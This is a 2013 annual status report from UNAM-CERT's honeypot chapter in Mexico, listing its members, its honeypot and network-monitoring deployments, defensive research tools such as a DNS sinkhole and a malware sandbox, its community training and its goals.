UNAM-Chapter - Status Report For 2013

published by mbautista on Fri, 01/31/2014 - 12:33

ORGANIZATION

The UNAM Chapter is part of UNAM-CERT, an organization established within the National Autonomous University of Mexico (UNAM).

Current chapter members:

  • Roberto Sanchez - Chapter lead.
  • Miguel Bautista - Chapter member.
  • Ruben Aquino – Chapter member.
  • Pablo Lorenzana – Chapter member.
  • Andres Hernandez – Chapter member.
  • Javier Santillan – Chapter member.

DEPLOYMENTS

We're using the following infrastructure as an early warning and intrusion detection system to feed into our incident response process, and also to identify emerging threats in the Internet and share this knowledge with the community.

We have 15 brand new Raspberry Pi’s and 3 HonEeeBox, divided into 5 Pi’s running Conpot, 5 Pi’s running Thug with direct shares to hpfeeds and the last are for mobile and Linux malware analysis.

One server with 8970 public IP addresses running Kippo, Dionaea and Glastopf, all data is being sharing data to hpfeeds.

Also we're running a centralized and staggered architecture for network monitoring based on snort, argus, tcpflow and several other tools for data capture and analysis.

A central system called “UNAM Security Telescope” to process all the information gathered by our honeypots and the centralized monitoring architecture.

RESEARCH AND DEVELOPMENT

We’ve developed a DNS Sinkhole in order to track and identify potential malicious PC’s hosting malware and bots within University’s network.

Working on the development of a spampot tool for collect and analysis of spam content like URL, attachments, source IP address, as well a Botnet tracking tool, for logging the activities of malware infected machines analyzing the commands sent by the C&C via IRC protocol.

A distributed sandbox based on Cuckoo platform to automate malware analysis for Windows XP, 7 and for Windows 8 is in development.

PAPERS, PRESENTATIONS AND COMMUNITY ENGAGEMENTS

At November we taught honeypot training to the community interested in honeypots and intrusion detection in Mexico City as a part of UNAM’s Security Congress 2013.

As part of UNAM-CERT one of our main activities is incident detection and handling within our University and Mexico, that’s why we are in close contact with CSIRTs of the main ISPs of Mexico, and sharing them information about security incidents coming from their networks that we are detecting on the University network.

FINDINGS

No particular findings yet.

GOALS

  • Identify trends in Mexico about attacks through statistics and charts generated by the data collected by our honeypots, and publish it in our web page.
  • Increase the number of our deployments within our University and Mexican academic networks.
  • Deployment and improvement of our spampot and botnet tracking tools.

MISC

Every year we organize a Computer Security Congress. It's a balanced meeting which includes technical and non-technical talks. Main purposes are: to share experiences, to discuss trends and to give attendees a better perspective of computer security around Mexican networks and the world.